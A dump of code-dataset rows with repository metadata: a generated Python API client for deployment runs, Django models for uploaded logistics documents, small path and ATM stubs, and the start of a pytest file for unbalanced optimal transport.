        >>> thread = api.set_deployment_run_lock(id, lock, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param bool lock: The desired lock state (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: bool
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.set_deployment_run_lock_with_http_info(id, lock, **kwargs)  # noqa: E501
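
    # Illustrative sketch (id hypothetical): the same endpoint both locks and
    # unlocks a run, driven by the boolean `lock` query parameter.
    #
    #     api.set_deployment_run_lock('run-123', True)   # lock the run
    #     api.set_deployment_run_lock('run-123', False)  # unlock the run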

    def set_deployment_run_lock_with_http_info(self, id, lock, **kwargs):  # noqa: E501
        """Update Lock  # noqa: E501

        Updates the Lock on a single Deployment Run with the given ID.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.set_deployment_run_lock_with_http_info(id, lock, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param bool lock: The desired lock state (required)
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['id', 'lock']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method set_deployment_run_lock" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `set_deployment_run_lock`")  # noqa: E501
        # verify the required parameter 'lock' is set
        if self.api_client.client_side_validation and ('lock' not in local_var_params or  # noqa: E501
                                                       local_var_params['lock'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `lock` when calling `set_deployment_run_lock`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501

        query_params = []
        if 'lock' in local_var_params and local_var_params['lock'] is not None:  # noqa: E501
            query_params.append(('lock', local_var_params['lock']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

        return self.api_client.call_api(
            '/api/drs/{id}/setlock', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='bool',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def set_power_schedule_for_deployment_run(self, id, **kwargs):  # noqa: E501
        """Update Power Schedule  # noqa: E501

        Updates the Power Schedule for a single Deployment Run with the given ID.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.set_power_schedule_for_deployment_run(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param PowerSchedule power_schedule: The desired power schedule
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: bool
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.set_power_schedule_for_deployment_run_with_http_info(id, **kwargs)  # noqa: E501
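
    # Illustrative sketch (assumes a PowerSchedule model in this package;
    # field values are hypothetical): the schedule is sent as the JSON body.
    #
    #     schedule = PowerSchedule()  # populate schedule fields as needed
    #     ok = api.set_power_schedule_for_deployment_run(
    #         'run-123', power_schedule=schedule)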

    def set_power_schedule_for_deployment_run_with_http_info(self, id, **kwargs):  # noqa: E501
        """Update Power Schedule  # noqa: E501

        Updates the Power Schedule for a single Deployment Run with the given ID.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.set_power_schedule_for_deployment_run_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param PowerSchedule power_schedule: The desired power schedule
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['id', 'power_schedule']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method set_power_schedule_for_deployment_run" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `set_power_schedule_for_deployment_run`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'power_schedule' in local_var_params:
            body_params = local_var_params['power_schedule']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json', 'application/xml'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

        return self.api_client.call_api(
            '/api/drs/{id}/powerschedule', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='bool',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def unpublish_deployment_run(self, id, **kwargs):  # noqa: E501
        """Unpublish Deployment Run  # noqa: E501

        Unpublishes the specified Deployment as a Composition. Consumers will no longer be able to connect to the run, and the run will no longer appear to consumers.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.unpublish_deployment_run(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: bool
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.unpublish_deployment_run_with_http_info(id, **kwargs)  # noqa: E501
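
    # Illustrative sketch (id hypothetical): publish and unpublish share the
    # '/api/drs/{id}/publish' path via POST and DELETE respectively; the
    # *_with_http_info variant also exposes the status code and headers.
    #
    #     data, status, headers = \
    #         api.unpublish_deployment_run_with_http_info('run-123')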

    def unpublish_deployment_run_with_http_info(self, id, **kwargs):  # noqa: E501
        """Unpublish Deployment Run  # noqa: E501

        Unpublishes the specified Deployment as a Composition. Consumers will no longer be able to connect to the run, and the run will no longer appear to consumers.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.unpublish_deployment_run_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method unpublish_deployment_run" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `unpublish_deployment_run`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

        return self.api_client.call_api(
            '/api/drs/{id}/publish', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='bool',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
| 50.09132 | 505 | 0.608184 | 19,284 | 166,203 | 5.012912 | 0.020743 | 0.04742 | 0.06995 | 0.026068 | 0.968459 | 0.962449 | 0.955901 | 0.950398 | 0.933846 | 0.928633 | 0 | 0.01593 | 0.316739 | 166,203 | 3,317 | 506 | 50.106421 | 0.835329 | 0.455142 | 0 | 0.784431 | 0 | 0 | 0.184158 | 0.052593 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037924 | false | 0 | 0.003327 | 0 | 0.079175 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2e02aaf313ee685b6f0ac2d4b9e1687eff80652d | 14849 | py | Python | web/transiq/fileupload/models.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | ["Apache-2.0"] | null | null | null | web/transiq/fileupload/models.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | ["Apache-2.0"] | 14 | 2020-06-05T23:06:45.000Z | 2022-03-12T00:00:18.000Z | web/transiq/fileupload/models.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | ["Apache-2.0"] | null | null | null |
# encoding: utf-8
from django.contrib.auth.models import User
from django.db import models

from api.models import S3Upload
from driver.models import Driver
from owner.models import Vehicle, Owner
from sme.models import Sme
from supplier.models import Supplier
from team.models import LrNumber, ManualBooking, Invoice

INVOICE_SENT_MODE_CHOICES = (
    ('CR', 'Courier'),
    ('HD', 'Hand Delivered'),
    ('EM', 'Email Screenshot')
)

INVOICE_CONFIRM_MODE_CHOICES = (
    ('PH', 'Phone'),
    ('WA', 'Written Acknowledgement'),
    ('EM', 'Email Screenshot')
)
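
# Illustrative sketch (a hypothetical field, not one of this module's models):
# choice tuples like those above are attached to a CharField so Django can
# validate stored codes and render the human-readable labels.
#
#     sent_mode = models.CharField(
#         max_length=2, choices=INVOICE_SENT_MODE_CHOICES, default='CR')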
class PODFile(models.Model):
uploaded_by = models.ForeignKey(User, null=True, blank=True, related_name='pod_file_uploaded_by',
on_delete=models.CASCADE)
verified_by = models.ForeignKey(User, null=True, blank=True, related_name='pod_file_verified_by',
on_delete=models.CASCADE, limit_choices_to={'is_staff': True})
lr_number = models.ForeignKey(LrNumber, null=True, related_name='pod_files', on_delete=models.CASCADE)
booking = models.ForeignKey(ManualBooking, null=True, blank=True, on_delete=models.CASCADE)
s3_url = models.URLField(blank=True, null=True, unique=True)
s3_thumb_url = models.URLField(blank=True, null=True, unique=True)
serial = models.CharField(max_length=20)
s3_upload = models.ForeignKey(S3Upload, related_name='upload_pod', on_delete=models.CASCADE)
verified = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
verified_datetime = models.DateTimeField(null=True, blank=True)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="pod_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="pod_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
class Meta:
unique_together = ('lr_number', 'serial')
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
    def __str__(self):  # Python 3 / Django 2+ use __str__, not __unicode__
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'lr_number': self.lr_number_id,
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
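
# The models below repeat the pattern established by PODFile: an S3Upload-backed
# file reference, verification (or resolution) flags, soft-delete bookkeeping
# (deleted / deleted_on), audit fields (created_by / changed_by,
# created_on / updated_on), and a small to_json() serializer.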
class WeighingSlip(models.Model):
uploaded_by = models.ForeignKey(User, null=True, blank=True, related_name='weighing_slip_uploaded_by',
on_delete=models.CASCADE)
verified_by = models.ForeignKey(User, null=True, blank=True, related_name='weighing_slip_file_verified_by',
on_delete=models.CASCADE, limit_choices_to={'is_staff': True})
booking = models.ForeignKey(ManualBooking, null=True, blank=True, on_delete=models.CASCADE)
s3_url = models.URLField(blank=True, null=True, unique=True)
s3_thumb_url = models.URLField(blank=True, null=True, unique=True)
serial = models.CharField(max_length=20)
s3_upload = models.ForeignKey(S3Upload, related_name='upload_weighing_slip', on_delete=models.CASCADE)
verified = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
verified_datetime = models.DateTimeField(null=True, blank=True)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE,
related_name="weighing_slip_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE,
related_name="weighing_slip_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
    def __str__(self):
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'booking_id': self.booking_id,
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
class VehicleFile(models.Model):
document_categories_choices = (
('PUC', 'Puc Certificate'),
('FIT', 'Fitness Certificate'),
('REG', 'Registration Certificate'),
('PERM', 'Permission Certificate'),
('INS', 'Insurance Certificate'),
)
uploaded_by = models.ForeignKey(User, null=True, blank=True, on_delete=models.CASCADE)
vehicle = models.ForeignKey(Vehicle, null=True, related_name='vehicle_files', on_delete=models.CASCADE)
supplier_vehicle = models.ForeignKey('supplier.Vehicle', null=True, related_name='supplier_vehicle_files',
on_delete=models.CASCADE)
document_category = models.CharField(max_length=70, choices=document_categories_choices, null=True)
s3_url = models.URLField(blank=True, null=True, unique=True)
s3_thumb_url = models.URLField(blank=True, null=True, unique=True)
serial = models.CharField(max_length=20)
verified = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
s3_upload = models.ForeignKey(S3Upload, related_name='upload_vehicle', on_delete=models.CASCADE)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="vehicle_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="vehicle_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
class Meta:
unique_together = ('vehicle', 'serial')
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
    def __str__(self):
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'vehicle_number': '' if not self.vehicle else self.vehicle.vehicle_number,
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
class OwnerFile(models.Model):
DOCUMENT_TYPE_CHOICES = (
('PAN', 'PAN Card'),
('DL', 'Driving Licence'),
('EL', 'Election ID'),
('AC', 'Aadhar Card'),
('PT', 'Passport'),
('RC', 'Ration Card'),
('DEC', 'Declaration'),
)
uploaded_by = models.ForeignKey(User, null=True, blank=True, on_delete=models.CASCADE)
owner = models.ForeignKey(Owner, null=True, related_name='owner_files', on_delete=models.CASCADE)
supplier = models.ForeignKey(Supplier, null=True, related_name='supplier_files', on_delete=models.CASCADE)
document_category = models.CharField(max_length=70, choices=DOCUMENT_TYPE_CHOICES, null=True)
s3_url = models.URLField(blank=True, null=True, unique=True)
s3_thumb_url = models.URLField(blank=True, null=True, unique=True)
serial = models.CharField(max_length=20)
verified = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
s3_upload = models.ForeignKey(S3Upload, related_name='upload_owner', on_delete=models.CASCADE)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="owner_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="owner_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
class Meta:
unique_together = ('owner', 'serial')
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
    def __str__(self):
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'owner_name': '' if not self.owner else self.owner.get_name(),
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
class DriverFile(models.Model):
DOCUMENT_TYPE_CHOICES = (
('PAN', 'PAN Card'),
('DL', 'Driving Licence'),
('EL', 'Election ID'),
('AC', 'Aadhar Card'),
('PT', 'Passport'),
('RC', 'Ration Card'),
)
uploaded_by = models.ForeignKey(User, null=True, blank=True, on_delete=models.CASCADE)
driver = models.ForeignKey(Driver, null=True, related_name='driver_files', on_delete=models.CASCADE)
supplier_driver = models.ForeignKey(to='supplier.Driver', related_name='supplier_driver_files', blank=True,
null=True,
on_delete=models.CASCADE)
document_category = models.CharField(max_length=70, choices=DOCUMENT_TYPE_CHOICES, null=True)
s3_url = models.URLField(blank=True, null=True, unique=True)
s3_thumb_url = models.URLField(blank=True, null=True, unique=True)
verified = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
serial = models.CharField(max_length=20)
s3_upload = models.ForeignKey(S3Upload, related_name='upload_driver', on_delete=models.CASCADE)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="driver_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="driver_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
class Meta:
unique_together = ('driver', 'serial')
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
    def __str__(self):
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'driver_name': '' if not self.driver else self.driver.name,
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
class ChequeFile(models.Model):
uploaded_by = models.ForeignKey(User, null=True, blank=True, related_name='fileupload_cheque_uploaded_by',
on_delete=models.CASCADE)
resolved_by = models.ForeignKey(User, null=True, blank=True, related_name='fileupload_cheque_resolved_by',
on_delete=models.CASCADE)
s3_url = models.URLField(blank=True, null=True, unique=True)
resolved_datetime = models.DateTimeField(null=True, blank=True)
customer_name = models.CharField(max_length=300, null=True)
customer = models.ForeignKey(Sme, related_name='cheque_files', null=True, blank=True, on_delete=models.CASCADE)
amount = models.IntegerField(default=0)
cheque_number = models.CharField(max_length=6, null=True, blank=True)
cheque_date = models.DateField(null=True)
remarks = models.CharField(max_length=300, blank=True, null=True)
resolved = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
serial = models.CharField(max_length=20)
s3_upload = models.ForeignKey(S3Upload, related_name='cheque_files', on_delete=models.CASCADE)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="cheque_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="cheque_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
class Meta:
unique_together = ('customer_name', 'serial')
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
    def __str__(self):
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'customer_name': self.customer_name,
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
class InvoiceReceiptFile(models.Model):
invoice_sent_mode = models.CharField(max_length=2, choices=INVOICE_SENT_MODE_CHOICES, null=True)
invoice_confirm_mode = models.CharField(max_length=2, choices=INVOICE_CONFIRM_MODE_CHOICES, null=True)
invoice_confirm_by_name = models.CharField(max_length=50, null=True, blank=True)
invoice_confirm_by_phone = models.CharField(max_length=15, null=True, blank=True)
uploaded_by = models.ForeignKey(User, null=True, blank=True, on_delete=models.CASCADE)
invoice_number = models.CharField(max_length=50, blank=True, null=True)
invoice_receipt = models.ForeignKey(Invoice, null=True, blank=True, on_delete=models.CASCADE)
verified = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
serial = models.CharField(max_length=20)
s3_upload = models.ForeignKey(S3Upload, related_name='upload_invoice_receipt', null=True, on_delete=models.CASCADE)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE,
related_name="invoice_receipt_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE,
related_name="invoice_receipt_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
    def __str__(self):
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
| 43.673529 | 119 | 0.686107 | 1,819 | 14,849 | 5.367235 | 0.085761 | 0.05654 | 0.060227 | 0.090341 | 0.831814 | 0.804159 | 0.780703 | 0.776196 | 0.761754 | 0.761754 | 0 | 0.006475 | 0.199205 | 14,849 | 339 | 120 | 43.80236 | 0.814566 | 0.00101 | 0 | 0.648084 | 0 | 0 | 0.098571 | 0.031958 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0.006969 | 0.027875 | 0.097561 | 0.686411 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
2e299e3cd074dedfe4726e80156ff2e67c3d32f3 | 385 | py | Python | _paths.py | supcl/mkecs-kde | 340c81466aabefc8e1df27c9ce151fde24f78a3a | [
"MIT"
] | 1 | 2019-05-01T02:52:31.000Z | 2019-05-01T02:52:31.000Z | _paths.py | marquettecomputationalsocialscience/mkecs-kde | 33fdec5e7691701d65de8a38aa1f27ecadb3d91b | [
"MIT"
] | null | null | null | _paths.py | marquettecomputationalsocialscience/mkecs-kde | 33fdec5e7691701d65de8a38aa1f27ecadb3d91b | [
"MIT"
] | 1 | 2019-01-24T17:46:15.000Z | 2019-01-24T17:46:15.000Z | def project_path():
path = 'set_path'
return str(path)
def sessions_path():
path = 'set_path'
return str(path)
def db_path():
path = 'set_path'
return str(path)
def plot_path_long():
path = 'set_path'
return str(path)
def plot_path_short():
path = 'set_path'
return str(path)
def mke_nhbd_path():
path = 'set_path'
return str(path)
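
# Intended use (an assumption, not stated in the module): each stub above is
# edited in place to return a real directory, e.g.
#   def db_path():
#       return '/data/mkecs/crime.db'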
| 16.041667 | 22 | 0.628571 | 57 | 385 | 3.982456 | 0.22807 | 0.185022 | 0.290749 | 0.449339 | 0.84141 | 0.84141 | 0.84141 | 0.599119 | 0.30837 | 0 | 0 | 0 | 0.246753 | 385 | 23 | 23 | 16.73913 | 0.782759 | 0 | 0 | 0.666667 | 0 | 0 | 0.124675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
2e91073c706a6d937cf169e0e94dba689276e6ac | 260 | py | Python | ATMProject/ATMSite/ATM/processing.py | HardinScott/ATM | 3dbf763f150d307fc75004ef0fb4692a62a6149d | [
"MIT"
] | null | null | null | ATMProject/ATMSite/ATM/processing.py | HardinScott/ATM | 3dbf763f150d307fc75004ef0fb4692a62a6149d | [
"MIT"
] | null | null | null | ATMProject/ATMSite/ATM/processing.py | HardinScott/ATM | 3dbf763f150d307fc75004ef0fb4692a62a6149d | [
"MIT"
] | null | null | null | def withdraw(request):
message = "Withdraw message"
# TODO
return message
def transfer(request):
message = "Transfer message"
# TODO
return message
def enquiry(request):
message = "Enquiry message"
# TODO
return message
| 15.294118 | 32 | 0.65 | 27 | 260 | 6.259259 | 0.296296 | 0.248521 | 0.301775 | 0.426036 | 0.319527 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.269231 | 260 | 16 | 33 | 16.25 | 0.889474 | 0.053846 | 0 | 0.333333 | 0 | 0 | 0.194215 | 0 | 0 | 0 | 0 | 0.0625 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
cf31688ef3d957794db694a259d28a79941953a3 | 6,957 | py | Python | fastuot/tests/test_fastuot.py | thibsej/fast_uot | aa057b168065e582378c4f88baa32350f0267401 | [
"MIT"
] | 5 | 2022-01-05T23:16:45.000Z | 2022-03-30T11:15:39.000Z | fastuot/tests/test_fastuot.py | thibsej/fast_uot | aa057b168065e582378c4f88baa32350f0267401 | [
"MIT"
] | null | null | null | fastuot/tests/test_fastuot.py | thibsej/fast_uot | aa057b168065e582378c4f88baa32350f0267401 | [
"MIT"
] | null | null | null | import pytest
import numpy as np
from fastuot.uot1d import rescale_potentials, dual_loss, init_greed_uot, \
solve_uot, lazy_potential, solve_ot, homogeneous_line_search, \
invariant_dual_loss, newton_line_search
p = 1.5
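
# `p` is the exponent of the ground cost |x - y|**p shared by every test below.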
@pytest.mark.parametrize('seed,rho,rho2,mass', [(a, b, c, d)
for a in [1, 2, 3, 4, 5, 6, 7]
for b in [0.1, 1.0, 10.0]
for c in [0.1, 1.0, 10.0]
for d in [0.5, 1., 2.]])
def test_rescale_potential_same_mass(seed, rho, rho2, mass):
n = int(15)
m = int(16)
np.random.seed(seed)
    normalize = lambda arr: arr / np.sum(arr)
a = normalize(np.random.uniform(size=n))
a = mass * a
b = normalize(np.random.uniform(size=m))
f = np.random.normal(size=a.shape[0])
g = np.random.normal(size=b.shape[0])
transl = rescale_potentials(f, g, a, b, rho, rho2)
A, B = a * np.exp(-(f + transl) / rho), b * np.exp(-(g - transl) / rho2)
